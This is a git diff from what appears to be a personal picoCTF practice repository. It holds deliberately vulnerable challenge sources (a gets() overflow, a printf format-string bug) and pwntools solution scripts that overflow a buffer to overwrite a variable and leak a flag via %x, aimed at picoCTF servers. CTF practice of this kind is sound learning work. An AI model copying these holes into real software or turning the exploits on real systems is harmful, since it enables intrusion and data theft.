Clutter Overflow

.envrc

@@ -0,0 +1,12 @@
+export MAMBA_EXE='/home/maxime/.local/bin/micromamba';
+export MAMBA_ROOT_PREFIX='/home/maxime/.micromamba';
+__mamba_setup="$("$MAMBA_EXE" shell hook --shell zsh --root-prefix "$MAMBA_ROOT_PREFIX" 2> /dev/null)"
+if [ $? -eq 0 ]; then
+    eval "$__mamba_setup"
+else
+    alias micromamba="$MAMBA_EXE"  # Fallback on help from micromamba activate
+fi
+unset __mamba_setup
+
+micromamba activate picoCTF
+

README.md

@@ -0,0 +1,7 @@
+# picoCTF
+
+## programs used
+- TrID
+- exiftool
+- aircrack-ng
+- kaitai

babygame03/.gdb_history

@@ -1,256 +0,0 @@
-c
-c
-x/40x 0xffffbd00
-c
-c
-run
-c
-run
-c
-x/40x 0xffffbd00
-c
-run
-exit
-b *move_player
-run < out
-c
-c
-x/40x 0xffffbd00
-c
-x/40x 0xffffbd00
-disassemble main
-b *main+39
-run < out
-stack 
-stack 20
-clear *main+3
-clear *main+39
-b *main+93
-run < out
-stack 20
-stack 20
-stack 40
-stack 60
-stack 80
-stack 100
-stack 200
-stack 100
-stack 110
-stack 400
-stack 1000
-stack 600
-stack 700
-stack 680
-stack 690
-stack 685
-stack 686
-stack 687
-stack 688
-stack 689
-stack 688
-x/x 0xffffdb0c
-x/x 0xffffbd0c
-continue
-c
-run < out
-x/x 0xffffbd0c
-c
-continue
-run < out
-c
-x/x 0xffffbd0c
-c
-x/x 0xffffbd0c
-disassemble main
-b *main+372
-x/x 0xffffbd0c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-c
-b
-clear 5
-exit
-disassemble main
-x/x 0xffffbd0c
-b *move_player
-run < out
-x/x 0xffffbd0c
-x/40x 0xffffbd00
-x/40x 0xffffcd00
-x/40x 0xffffbd00
-x/40x 0xffffbf00
-x/40x 0xffffbd00
-x/40x 0xffffbd00
-x/40x 0xffffbd00
-x/40x 0xffffc000
-x/40x 0xffffc400
-x/40x 0xffffc600
-x/40x 0xffffc800
-x/40x 0xffffc700
-x/40x 0xffffc780
-x/40x 0xffffbd00
-x/40x 0xffffc780
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-x/40x 0xffffbd00
-exit
-b *move_player
-x/x 0xffffbd0c
-x/x 0xffffc7ac
-run < out2
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-c
-c
-x/x 0xffffc7ac
-c
-x/x 0xffffc7ac
-run < out2
-x/x 0xffffc7ac
-x/x 0xffffbd0c
-c
-x/x 0xffffc7ac
-c
-x/x 0xffffc7ac
-x/40x 0xffffbd00
-exit
-disassemble main
-disassemble move_player
-b *move_player+8
-run 
-stack 20
-stack 30
-x/40x 0xffa890
-x/40x 0xffffa890
-exit
-b *move_player+8
-run
-stack 20
-c
-c
-stack 20
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-x/40x 0xffffa890
-c
-exit
-exit
-disassemble main 
-q
-disassemble main 
-disassemble move_
-disassemble move_player
-b *move_player+357
-run < out
-c
-run < out
-c
-exit
-b *move_player+357
-run < out3
-c
-stack 20
-x/40x 0xffffbce0
-x/40x 0xffffbcf0
-x/40x 0xffffbe00
-x/40x 0xffffbd0
-x/40x 0xffffbd00
-x/40x 0xffffbd2f
-x/40x 0xffffbd00
-x/40x 0xffffbc00
-x/40x 0xffffbcd0
-stack 30
-stack 800
-stack 700
-stack 720
-stack 700
-stack 710
-stack 720
-disassemble main
-stack 40
-stack -1 40
-stack 40 -1
-stack 40 -10
-stack 40
-stack 40
-x/40x 0xffffbcd0
-x/40x 0xffffbce0
-c
-c
-c
-c
-c
-run < out3
-c
-run 
-c
-c
-c
-c
-c
-c
-c
-exit
-disassemble move_player
-b *move_player+357
-run < out2
-c
-stack 40
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-run < out2
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-c
-x/40x 0xffffbce0
-run < out2
-c
-x/40x 0xffffbce0
-c
-c
-exit
-disassemble main
-b *main+378
-run < args
-run < args
-run < args
-tic
-exit

babygame03/args

@@ -1,2 +0,0 @@
-aaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwspaaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpwsaaaaaaaawwwwswws
-

babygame03/babygame03.lock

@@ -1,9 +0,0 @@
-#Ghidra Lock File
-#Mon Nov 18 09:14:36 CET 2024
-<META>\ Supports\ File\ Channel\ Locking=Channel Lock
-Hostname=theon-1
-OS\ Architecture=amd64
-OS\ Name=Linux
-OS\ Version=6.11.6-arch1-1
-Timestamp=11/18/24, 9\:14\u202FAM
-Username=maxime

babygame03/babygame03.rep/idata/00/00000001.prp

@@ -1,11 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
-        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
-        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b32f38007603038077" />
-        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
-        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
-        <STATE NAME="NAME" TYPE="string" VALUE="game" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/idata/~index.bak

@@ -1,7 +0,0 @@
-VERSION=1
-/
-  00000001:game:ac10290b32f38007603038077
-/New Traces
-  00000002:Emulate game:ac10290839926930849280384
-NEXT-ID:3
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~index.dat

@@ -1,5 +0,0 @@
-VERSION=1
-/
-  00000001:game:ac10290b32f38007603038077
-NEXT-ID:3
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/idata/~journal.bak

@@ -1,2 +0,0 @@
-IDEL:/New Traces/Emulate game
-FDEL:/New Traces

babygame03/babygame03.rep/project.prp

@@ -1,6 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="OWNER" TYPE="string" VALUE="maxime" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/projectState

@@ -1,15 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<PROJECT>
-    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
-        <SAVE_STATE>
-            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
-                <A VALUE="babygame03:" />
-            </ARRAY>
-            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
-        </SAVE_STATE>
-    </PROJECT_DATA_XML_NAME>
-    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
-        <WORKSPACE NAME="Workspace" ACTIVE="true" />
-    </TOOL_MANAGER>
-</PROJECT>
-

babygame03/babygame03.rep/user/00/00000001.prp

@@ -1,11 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<FILE_INFO>
-    <BASIC_INFO>
-        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="ProgramUserData" />
-        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
-        <STATE NAME="FILE_ID" TYPE="string" VALUE="ac10290b31146457713312322" />
-        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
-        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
-        <STATE NAME="NAME" TYPE="string" VALUE="udf_ac10290b32f38007603038077" />
-    </BASIC_INFO>
-</FILE_INFO>

babygame03/babygame03.rep/user/~index.bak

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:1
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~index.dat

@@ -1,5 +0,0 @@
-VERSION=1
-/
-  00000001:udf_ac10290b32f38007603038077:ac10290b31146457713312322
-NEXT-ID:2
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/user/~journal.bak

@@ -1,2 +0,0 @@
-IADD:00000001:/udf_ac10290b32f38007603038077
-IDSET:/udf_ac10290b32f38007603038077:ac10290b31146457713312322

babygame03/babygame03.rep/versioned/~index.bak

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:0
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/babygame03.rep/versioned/~index.dat

@@ -1,4 +0,0 @@
-VERSION=1
-/
-NEXT-ID:0
-MD5:d41d8cd98f00b204e9800998ecf8427e

babygame03/flag.txt

@@ -1 +0,0 @@
-flag{test}

babygame03/mkstr.py

@@ -1,10 +0,0 @@
-#!/usr/bin/env python3
-from pwn import *
-
-a = 'aaaa'+'a'*4+'wwwws'
-b = 'a'*47+'lp'+'ws'
-
-s = a+'p' +a+'p' +a+'p' +a +b +a +'wws\n'
-
-print(s)
-

babygame03/out

@@ -1 +0,0 @@
-aaaaaaaawwwws

babygame03/out2

@@ -1 +0,0 @@
-aaaaaaaawwwwsaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalpws

babygame03/out3

@@ -1 +0,0 @@
-aaaaaaaawwwws

babygame03/sol.py

@@ -1,16 +0,0 @@
-#!/usr/bin/env python3
-from pwn import *
-
-s = b'aaaa'+b'a'*4+b'wwwws'
-
-conn = process(["./game"])
-for i in range(3):
-    conn.sendline(s)
-    conn.sendline(b'p')
-conn.sendline(s)
-conn.sendline(b'a'*47+b'l\x70'+b'ws')
-conn.sendline(s)
-conn.sendline(b'wws')
-conn.sendline(b'a'*47+b'l\xfe'+b'w')
-conn.interactive()
-

basic_file_exploit/program-redacted.c

@@ -0,0 +1,195 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <string.h>
+#include <stdint.h>
+#include <ctype.h>
+#include <unistd.h>
+#include <sys/time.h>
+#include <sys/types.h>
+
+
+#define WAIT 60
+
+
+static const char* flag = "[REDACTED]";
+
+static char data[10][100];
+static int input_lengths[10];
+static int inputs = 0;
+
+
+
+int tgetinput(char *input, unsigned int l)
+{
+    fd_set          input_set;
+    struct timeval  timeout;
+    int             ready_for_reading = 0;
+    int             read_bytes = 0;
+    
+    if( l <= 0 )
+    {
+      printf("'l' for tgetinput must be greater than 0\n");
+      return -2;
+    }
+    
+    
+    /* Empty the FD Set */
+    FD_ZERO(&input_set );
+    /* Listen to the input descriptor */
+    FD_SET(STDIN_FILENO, &input_set);
+
+    /* Waiting for some seconds */
+    timeout.tv_sec = WAIT;    // WAIT seconds
+    timeout.tv_usec = 0;    // 0 milliseconds
+
+    /* Listening for input stream for any activity */
+    ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
+    /* Here, first parameter is number of FDs in the set, 
+     * second is our FD set for reading,
+     * third is the FD set in which any write activity needs to updated,
+     * which is not required in this case. 
+     * Fourth is timeout
+     */
+
+    if (ready_for_reading == -1) {
+        /* Some error has occured in input */
+        printf("Unable to read your input\n");
+        return -1;
+    } 
+
+    if (ready_for_reading) {
+        read_bytes = read(0, input, l-1);
+        if(input[read_bytes-1]=='\n'){
+        --read_bytes;
+        input[read_bytes]='\0';
+        }
+        if(read_bytes==0){
+            printf("No data given.\n");
+            return -4;
+        } else {
+            return 0;
+        }
+    } else {
+        printf("Timed out waiting for user input. Press Ctrl-C to disconnect\n");
+        return -3;
+    }
+
+    return 0;
+}
+
+
+static void data_write() {
+  char input[100];
+  char len[4];
+  long length;
+  int r;
+  
+  printf("Please enter your data:\n");
+  r = tgetinput(input, 100);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+  
+  while (true) {
+    printf("Please enter the length of your data:\n");
+    r = tgetinput(len, 4);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+  
+    if ((length = strtol(len, NULL, 10)) == 0) {
+      puts("Please put in a valid length");
+    } else {
+      break;
+    }
+  }
+
+  if (inputs > 10) {
+    inputs = 0;
+  }
+
+  strcpy(data[inputs], input);
+  input_lengths[inputs] = length;
+
+  printf("Your entry number is: %d\n", inputs + 1);
+  inputs++;
+}
+
+
+static void data_read() {
+  char entry[4];
+  long entry_number;
+  char output[100];
+  int r;
+
+  memset(output, '\0', 100);
+  
+  printf("Please enter the entry number of your data:\n");
+  r = tgetinput(entry, 4);
+  // Timeout on user input
+  if(r == -3)
+  {
+    printf("Goodbye!\n");
+    exit(0);
+  }
+  
+  if ((entry_number = strtol(entry, NULL, 10)) == 0) {
+    puts(flag);
+    fseek(stdin, 0, SEEK_END);
+    exit(0);
+  }
+
+  entry_number--;
+  strncpy(output, data[entry_number], input_lengths[entry_number]);
+  puts(output);
+}
+
+
+int main(int argc, char** argv) {
+  char input[3] = {'\0'};
+  long command;
+  int r;
+
+  puts("Hi, welcome to my echo chamber!");
+  puts("Type '1' to enter a phrase into our database");
+  puts("Type '2' to echo a phrase in our database");
+  puts("Type '3' to exit the program");
+
+  while (true) {   
+    r = tgetinput(input, 3);
+    // Timeout on user input
+    if(r == -3)
+    {
+      printf("Goodbye!\n");
+      exit(0);
+    }
+    
+    if ((command = strtol(input, NULL, 10)) == 0) {
+      puts("Please put in a valid number");
+    } else if (command == 1) {
+      data_write();
+      puts("Write successful, would you like to do anything else?");
+    } else if (command == 2) {
+      if (inputs == 0) {
+        puts("No data yet");
+        continue;
+      }
+      data_read();
+      puts("Read successful, would you like to do anything else?");
+    } else if (command == 3) {
+      return 0;
+    } else {
+      puts("Please type either 1, 2 or 3");
+      puts("Maybe breaking boundaries elsewhere will be helpful");
+    }
+  }
+
+  return 0;
+}

clutter_overflow/chall.c

@@ -0,0 +1,54 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+#define SIZE 0x100
+#define GOAL 0xdeadbeef
+
+const char* HEADER = 
+" ______________________________________________________________________\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n"
+"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n"
+"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ /                  \\^ ^ |\n"
+"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ /   \\ ^ _ ^ / |                | \\^ ^|\n"
+"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | //  | /_\\ ^| |   ____  ____   | | ^ |\n"
+"|^ =|= ^ =================^ ^=|=^|     |^=|=^ | |  {____}{____}  | |^ ^|\n"
+"| ^ ^ ^ ^ |  =========  |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n"
+"|^ ^ ^ ^ ^| /     (   \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/  %%%%%%%%%%%%%%  \\|^ ^|\n"
+".-----. ^ ||     )     ||^ ^.-------.-------.^|  %%%%%%%%%%%%%%%%  | ^ |\n"
+"|     |^ ^|| o  ) (  o || ^ |       |       | | /||||||||||||||||\\ |^ ^|\n"
+"| ___ | ^ || |  ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n"
+"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|==                    =====\n"
+"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"  \n"
+"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n"
+"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"";
+
+int main(void)
+{
+  long code = 0;
+  char clutter[SIZE];
+
+  setbuf(stdout, NULL);
+  setbuf(stdin, NULL);
+  setbuf(stderr, NULL);
+ 	
+  puts(HEADER); 
+  puts("My room is so cluttered...");
+  puts("What do you see?");
+
+  gets(clutter);
+
+
+  if (code == GOAL) {
+    printf("code == 0x%llx: how did that happen??\n", GOAL);
+    puts("take a flag for your troubles");
+    system("cat flag.txt");
+  } else {
+    printf("code == 0x%llx\n", code);
+    printf("code != 0x%llx :(\n", GOAL);
+  }
+
+  return 0;
+}

clutter_overflow/sol.py

@@ -0,0 +1,55 @@
+#!/usr/bin/env python
+from pwn import *
+
+def get_conn():
+    #return process("./chall")
+    return remote("mars.picoctf.net", 31890)
+
+def try_memory_offset(offset):
+    cycle = cyclic(length=offset, n=8)
+
+    conn = get_conn()
+    
+    conn.recvuntil(b"see?")
+    conn.recvline()
+    
+    conn.sendline(cycle)
+    conn.recvuntil(b"== ")
+    result = conn.recvline(keepends=False)
+
+    conn.close()
+    
+    return result
+
+base = 0x100
+exp = 0
+p = log.progress("searching for variable offset")
+while True:
+    offset = base + 2**exp
+    p.status(f"trying offset {offset}")
+    try:
+        result = try_memory_offset(offset)
+    except:
+        base = base + 2**(exp-1)
+        exp = 0
+        continue
+    if result != b"0x0":
+        next_result = 0
+        i = 0
+        while result != next_result:
+            i += 1
+            result = next_result
+            next_result = try_memory_offset(offset+i)
+        offset = cyclic_find(int(result, 16), n=8)
+        p.success(f"found result {unhex(result[2:])} at offset {offset}")
+        break
+    exp += 1
+
+conn = get_conn()
+
+conn.recvuntil(b"see?")
+conn.recvline()
+
+conn.sendline(b"a"*offset + p64(0xdeadbeef))
+conn.interactive()
+

flag_leak/.gdb_history

@@ -0,0 +1,2 @@
+disassemble main
+exit

flag_leak/sol.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_size = 127
+hex_to_read = 127//2
+hex_reader = b'%x'*hex_to_read
+payload = hex_reader + b'.'
+log.info(f"payload: {payload}")
+
+def endian_swap(s, offset=0):
+    result = b''
+    for i in range(3+offset, len(s), 4):
+        result += bytes(reversed(s[i-3:i+1]))
+    return result
+
+conn = remote("saturn.picoctf.net", 65206)
+
+conn.recvuntil(b" >> ")
+conn.sendline(payload)
+conn.recvline()
+data = conn.recvline(keepends=False)[:-1]
+log.info(f"received data: {data}")
+unhexed_data = unhex(data)
+for i in range(4):
+    endian_swapped_data = endian_swap(unhexed_data, offset=i)
+    if b"picoCTF" in endian_swapped_data:
+        break
+log.info(f"processed data: {endian_swapped_data}")
+

flag_leak/vuln.c

@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+   char flag[BUFSIZE];
+   char story[128];
+
+   readflag(flag, FLAGSIZE);
+
+   printf("Tell me a story and then I'll tell you one >> ");
+   scanf("%127s", story);
+   printf("Here's a story - \n");
+   printf(story);
+   printf("\n");
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+  return 0;
+}

mob_psycho/flag.txt

@@ -1 +0,0 @@
-7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f35653637656135657d

mob_psycho/mobpsycho/META-INF/androidx.activity_activity.version

@@ -1 +0,0 @@
-1.6.0

mob_psycho/mobpsycho/META-INF/androidx.annotation_annotation-experimental.version

@@ -1 +0,0 @@
-1.3.0

mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat-resources.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/androidx.arch.core_core-runtime.version

@@ -1 +0,0 @@
-2.1.0

mob_psycho/mobpsycho/META-INF/androidx.cardview_cardview.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.coordinatorlayout_coordinatorlayout.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.core_core-ktx.version

@@ -1 +0,0 @@
-1.9.0

mob_psycho/mobpsycho/META-INF/androidx.core_core.version

@@ -1 +0,0 @@
-1.9.0

mob_psycho/mobpsycho/META-INF/androidx.cursoradapter_cursoradapter.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.customview_customview.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.documentfile_documentfile.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.drawerlayout_drawerlayout.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.dynamicanimation_dynamicanimation.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2-views-helper.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.fragment_fragment.version

@@ -1 +0,0 @@
-1.3.6

mob_psycho/mobpsycho/META-INF/androidx.interpolator_interpolator.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.legacy_legacy-support-core-utils.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata-core.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata.version

@@ -1 +0,0 @@
-2.0.0

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-process.version

@@ -1 +0,0 @@
-2.4.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-runtime.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel-savedstate.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.loader_loader.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.localbroadcastmanager_localbroadcastmanager.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.print_print.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.recyclerview_recyclerview.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.savedstate_savedstate.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.startup_startup-runtime.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.tracing_tracing.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.transition_transition.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable-animated.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.versionedparcelable_versionedparcelable.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.viewpager2_viewpager2.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.viewpager_viewpager.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/com.google.android.material_material.version

@@ -1 +0,0 @@
-1.5.0

mob_psycho/mobpsycho/META-INF/com/android/build/gradle/app-metadata.properties

@@ -1,2 +0,0 @@
-appMetadataVersion=1.1
-androidGradlePluginVersion=8.0.2

mob_psycho/mobpsycho/META-INF/kotlinx_coroutines_android.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/kotlinx_coroutines_core.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/services/kotlinx.coroutines.CoroutineExceptionHandler

@@ -1 +0,0 @@
-kotlinx.coroutines.android.AndroidExceptionPreHandler

mob_psycho/mobpsycho/META-INF/services/kotlinx.coroutines.internal.MainDispatcherFactory

@@ -1 +0,0 @@
-kotlinx.coroutines.android.AndroidDispatcherFactory